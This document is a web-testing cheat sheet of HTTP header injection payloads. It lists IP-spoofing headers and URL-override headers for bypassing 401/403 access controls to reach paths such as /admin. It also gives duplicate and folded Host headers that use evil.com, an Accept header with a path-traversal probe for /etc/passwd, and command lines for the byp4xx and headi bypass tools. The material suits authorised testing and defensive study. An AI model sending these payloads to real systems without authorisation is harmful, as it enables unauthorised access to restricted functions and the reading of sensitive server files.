Header injections

Headers

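# Header injection candidates. Set the value to something the back end may trust
# or route on: 127.0.0.1, localhost, an internal address such as 192.168.1.2,
# the target's own hostname (target.com), or a path such as /admin or /console.
# NOTE: these only have an effect when the application trusts client-supplied
# headers (typically because it expects a reverse proxy to set them and nothing
# at the edge strips them). Try each header on its own as well as in bulk - some
# stacks reject a request as soon as one unexpected header is present.
Client-IP:
Connection:
Contact:
Forwarded:
From:
Host:
Origin:
Referer:
True-Client-IP:
X-Client-IP:
X-Custom-IP-Authorization:
X-Forward-For:
X-Forwarded-For:
X-Forwarded-Host:
X-Forwarded-Server:
X-Host:
X-Original-URL:
X-Originating-IP:
X-Real-IP:
X-Remote-Addr:
X-Remote-IP:
X-Rewrite-URL:
X-Wap-Profile:

# Duplicate Host header: a front end and a back end may each honour a different one
Host: legit.com
Stuff: stuff
Host: evil.com

# Accept header: force a different response format (e.g. JSON instead of HTML),
# or probe code that reflects/logs the header for path traversal and template injection
Accept: application/json, text/javascript, */*; q=0.01
Accept: ../../../../../../../../../etc/passwd{{'

# Protocol downgrade: change HTTP/1.1 to HTTP/1.0 or HTTP/0.9 and omit the Host header
# (only mandatory from HTTP/1.1) - some servers then fall back to a default virtual host

# 401/403 bypasses
# Spoof a whitelisted source IP (127.0.0.1 or localhost). Only effective when the
# application reads the client address from a header instead of the TCP peer.
Client-IP: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For: localhost
Forwarded: 127.0.0.1
Forwarded: localhost
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forward: 127.0.0.1
X-Forward: localhost
X-Forwarded-By: 127.0.0.1
X-Forwarded-By: localhost
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For-Original: localhost
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: localhost
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Server: localhost
X-Forwarded: 127.0.0.1
X-Forwarded: localhost
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Host: localhost
X-Host: 127.0.0.1
X-Host: localhost
X-HTTP-Host-Override: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-Addr: localhost
X-Remote-IP: 127.0.0.1

# URL override - send a GET to an endpoint you CAN reach (e.g. /) and add one of
# these so a framework or front end that honours them rewrites it to the restricted path:
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
Referer: /admin
# Also try the absolute URL form, e.g. https://domain.com/admin

# Method override (when only GET/POST reach the back end, or the ACL is per method)
X-HTTP-Method-Override: PUT

# Absolute URI in the request line: the front end may route on the request-line
# host while the back end uses the Host header (or the other way round)
GET https://vulnerable-website.com/ HTTP/1.1
Host: evil-website.com

# Line wrapping (obsolete header folding): indent the injected Host header so one
# server treats it as a continuation of the previous line while the other
# accepts it as a second Host header
GET /index.php HTTP/1.1
    Host: evil-website.com
Host: vulnerable-website.com

# Wordlists
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers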

Tools

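# byp4xx - automates 401/403 bypass attempts against a single URL
# https://github.com/lobuhi/byp4xx
./byp4xx.sh https://url/path

# Assorted bug-bounty helper scripts
# https://github.com/OdinF13/Bug-Bounty-Scripts

# headi - header injection fuzzer; point it at the restricted path
# https://github.com/mlcsec/headi
headi -url http://target.com/admin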